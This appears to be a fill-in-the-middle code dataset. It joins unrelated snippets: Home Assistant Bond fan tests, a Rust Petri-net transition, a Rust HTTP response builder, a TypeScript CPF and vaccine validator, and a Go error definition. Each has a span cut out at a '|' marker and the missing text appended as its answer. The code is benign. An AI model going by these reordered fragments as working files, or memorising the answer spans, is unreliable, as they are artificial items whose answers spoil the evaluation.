registry: EntityRegistry = await hass.helpers.entity_registry.async_get_registry()
assert [key for key in registry.entities] == ["fan.name_1"]
async def test_non_standard_speed_list(hass: core.HomeAssistant):
"""Tests that the device is registered with custom speed list if number of supported speeds differs form 3."""
await setup_platform(
hass,
FAN_DOMAIN,
ceiling_fan("name-1"),
bond_device_id="test-device-id",
props={"max_speed": 6},
)
actual_speeds = hass.states.get("fan.name_1").attributes[ATTR_SPEED_LIST]
assert actual_speeds == [
fan.SPEED_OFF,
fan.SPEED_LOW,
fan.SPEED_MEDIUM,
fan.SPEED_HIGH,
]
with patch_bond_device_state():
with patch_bond_action() as mock_set_speed_low:
await turn_fan_on(hass, "fan.name_1", fan.SPEED_LOW)
mock_set_speed_low.assert_called_once_with(
"test-device-id", Action.set_speed(1)
)
with patch_bond_action() as mock_set_speed_medium:
await turn_fan_on(hass, "fan.name_1", fan.SPEED_MEDIUM)
mock_set_speed_medium.assert_called_once_with(
"test-device-id", Action.set_speed(3)
)
with patch_bond_action() as mock_set_speed_high:
await turn_fan_on(hass, "fan.name_1", fan.SPEED_HIGH)
mock_set_speed_high.assert_called_once_with(
"test-device-id", Action.set_speed(6)
)
async def test_turn_on_fan_with_speed(hass: core.HomeAssistant):
"""Tests that turn on command delegates to set speed API."""
await setup_platform(
hass, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_action() as mock_set_speed, patch_bond_device_state():
await turn_fan_on(hass, "fan.name_1", fan.SPEED_LOW)
mock_set_speed.assert_called_with("test-device-id", Action.set_speed(1))
async def | (hass: core.HomeAssistant):
"""Tests that turn on command delegates to turn on API."""
await setup_platform(
hass, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_action() as mock_turn_on, patch_bond_device_state():
await turn_fan_on(hass, "fan.name_1")
mock_turn_on.assert_called_with("test-device-id", Action.turn_on())
async def test_turn_off_fan(hass: core.HomeAssistant):
"""Tests that turn off command delegates to API."""
await setup_platform(
hass, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_action() as mock_turn_off, patch_bond_device_state():
await hass.services.async_call(
FAN_DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: "fan.name_1"}, blocking=True,
)
await hass.async_block_till_done()
mock_turn_off.assert_called_once_with("test-device-id", Action.turn_off())
async def test_update_reports_fan_on(hass: core.HomeAssistant):
"""Tests that update command sets correct state when Bond API reports fan power is on."""
await setup_platform(hass, FAN_DOMAIN, ceiling_fan("name-1"))
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(hass, utcnow() + timedelta(seconds=30))
await hass.async_block_till_done()
assert hass.states.get("fan.name_1").state == "on"
async def test_update_reports_fan_off(hass: core.HomeAssistant):
"""Tests that update command sets correct state when Bond API reports fan power is off."""
await setup_platform(hass, FAN_DOMAIN, ceiling_fan("name-1"))
with patch_bond_device_state(return_value={"power": 0, "speed": 1}):
async_fire_time_changed(hass, utcnow() + timedelta(seconds=30))
await hass.async_block_till_done()
assert hass.states.get("fan.name_1").state == "off"
async def test_update_reports_direction_forward(hass: core.HomeAssistant):
"""Tests that update command sets correct direction when Bond API reports fan direction is forward."""
await setup_platform(hass, FAN_DOMAIN, ceiling_fan("name-1"))
with patch_bond_device_state(return_value={"direction": Direction.FORWARD}):
async_fire_time_changed(hass, utcnow() + timedelta(seconds=30))
await hass.async_block_till_done()
assert hass.states.get("fan.name_1").attributes[ATTR_DIRECTION] == DIRECTION_FORWARD
async def test_update_reports_direction_reverse(hass: core.HomeAssistant):
"""Tests that update command sets correct direction when Bond API reports fan direction is reverse."""
await setup_platform(hass, FAN_DOMAIN, ceiling_fan("name-1"))
with patch_bond_device_state(return_value={"direction": Direction.REVERSE}):
async_fire_time_changed(hass, utcnow() + timedelta(seconds=30))
await hass.async_block_till_done()
assert hass.states.get("fan.name_1").attributes[ATTR_DIRECTION] == DIRECTION_REVERSE
async def test_set_fan_direction(hass: core.HomeAssistant):
"""Tests that set direction command delegates to API."""
await setup_platform(
hass, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_action() as mock_set_direction, patch_bond_device_state():
await hass.services.async_call(
FAN_DOMAIN,
SERVICE_SET_DIRECTION,
{ATTR_ENTITY_ID: "fan.name_1", ATTR_DIRECTION: DIRECTION_FORWARD},
blocking=True,
)
await hass.async_block_till_done()
mock_set_direction.assert_called_once_with(
"test-device-id", Action.set_direction(Direction.FORWARD)
)
| test_turn_on_fan_without_speed |
transition.rs | use crate::{arc, Marking, PlaceId, TransitionId};
/// Transition with only production and consumption
#[derive(Default, Debug, Clone)]
pub struct Transition {
/// Identifier of the transition
pub(crate) id: TransitionId,
/// Label of the transition
pub label: Option<String>,
/// Consumption of the transition
pub consume: Marking<PlaceId>,
/// Production of the transition
pub produce: Marking<PlaceId>,
/// This transition is disconnected from the network and only kept to avoid index problems
pub deleted: bool,
}
impl Transition {
/// Return the id of the transition
#[must_use]
pub fn id(&self) -> TransitionId {
self.id
}
/// Returns [`true`] if this transition is disconnected from the network
#[must_use] | self.consume.is_empty() && self.produce.is_empty()
}
/// Get all arcs of this transition
#[must_use]
pub fn get_arcs(&self) -> Vec<arc::Kind> {
let mut arcs = vec![];
for &(pl, w) in self.consume.iter() {
arcs.push(arc::Kind::Consume(pl, self.id, w))
}
for &(pl, w) in self.produce.iter() {
arcs.push(arc::Kind::Produce(pl, self.id, w))
}
arcs
}
} | pub fn is_disconnected(&self) -> bool { |
http_response.rs | use std::collections::HashMap;
use chrono::{DateTime, Utc};
use crate::http_request::*;
use crate::method;
use crate::status;
#[derive(Clone, Debug)]
pub struct Response {
pub version: Version,
pub status: status::Code,
pub host: &'static str,
pub path: String,
pub header: HashMap<String, String>,
pub modified_datetime: Option<DateTime<Utc>>,
pub entity_body: Vec<u8>,
}
pub fn new() -> Response {
Response {
version: Version::V0_9,
status: status::OK,
host: "",
path: String::new(),
header: HashMap::new(),
modified_datetime: None,
entity_body: Vec::new(),
}
}
impl Response {
pub fn add_header(&mut self, name: &str, value: String) {
self.header.insert(name.to_string(), value);
}
fn status_line(&self) -> String {
// Status-Line = HTTP-Version SP Status-Code SP Reason-Phrase CRLF
// "HTTP/" 1*DIGIT "." 1*DIGIT SP 3DIGIT SP
format!(
"HTTP/{} {}\r\n",
self.version.to_string(),
status::to_string(self.status)
)
}
#[allow(dead_code)]
pub fn set_location(&mut self, status: status::Code3, absolute_uri: String) {
// Location = "Location" ":" absoluteURI
self.status = status;
self.header.insert("Location".to_string(), absolute_uri);
}
#[allow(dead_code)]
pub fn set_extention_status(&mut self, id: isize, phrase: &'static str) {
self.status = (id, phrase);
}
#[allow(dead_code)]
pub fn allow(&mut self, m: method::Method) {
let value = match self.header.get("Allow") {
Some(s) => format!("{}, {}", s, m),
None => m.to_string(),
};
self.header.insert("Allow".to_string(), value);
}
pub fn | (&mut self, ip_port: String) {
self.header.insert("HOST".to_string(), ip_port);
}
pub fn set_server(&mut self, name: String) {
// Server = "Server" ":" 1*( product | comment )
self.header.insert("Server".to_string(), name);
}
// TODO WWW-Authenticate
pub fn to_bytes(&self) -> Vec<u8> {
let mut ret = Vec::new();
// Status-Line
ret.append(&mut Vec::from(self.status_line().as_bytes()));
// Header
for (k, v) in &self.header {
ret.append(&mut Vec::from(format!("{}: {}\r\n", k, v).as_bytes()));
}
ret.append(&mut Vec::from("\r\n".as_bytes()));
ret.append(&mut self.entity_body.clone());
return ret;
}
}
| set_host |
vacinaValidator.ts | import { body, validationResult } from "express-validator";
import { validarCPF } from "./cpfValidator";
import vacinaServico from "../services/vacinaService";
function | () {
return [
body("cpf")
.isLength({ min: 11, max: 11 })
.withMessage("Tamanho deve ser de 11 caracteres"),
body("cpf").notEmpty().withMessage("CPF obrigatório!!"),
body("nome").notEmpty().withMessage("Nome obrigatório!!"),
body("nome")
.isLength({ min: 5, max: 100 })
.withMessage("Mínimo 5 caracteres e Máximo 100 caracteres"),
body("flTomou")
.notEmpty()
.withMessage("Obrigatório inserir se tomou ou não a vacina!!"),
body("cpf").notEmpty().withMessage("CPF obrigatório"),
body("cpf")
.custom((value: any) => {
if (!validarCPF(value)) throw new Error("CPF é inválido!");
return true;
})
.withMessage("Cpf inválido"),
body("cpf").custom(async (value: any) => {
const resultadoVacina = await vacinaServico.buscaSolicitacaoPorCpf(value);
if (resultadoVacina != null) {
throw new Error("CPF já existe, cadastro não permitido!");
}
return true;
}),
];
};
export {
VacinaValidationRules
};
| VacinaValidationRules |
error.go | package silence
import (
"github.com/giantswarm/microerror"
)
| Kind: "invalidConfigError",
}
// IsInvalidConfig asserts invalidConfigError.
func IsInvalidConfig(err error) bool {
return microerror.Cause(err) == invalidConfigError
} | var invalidConfigError = &microerror.Error{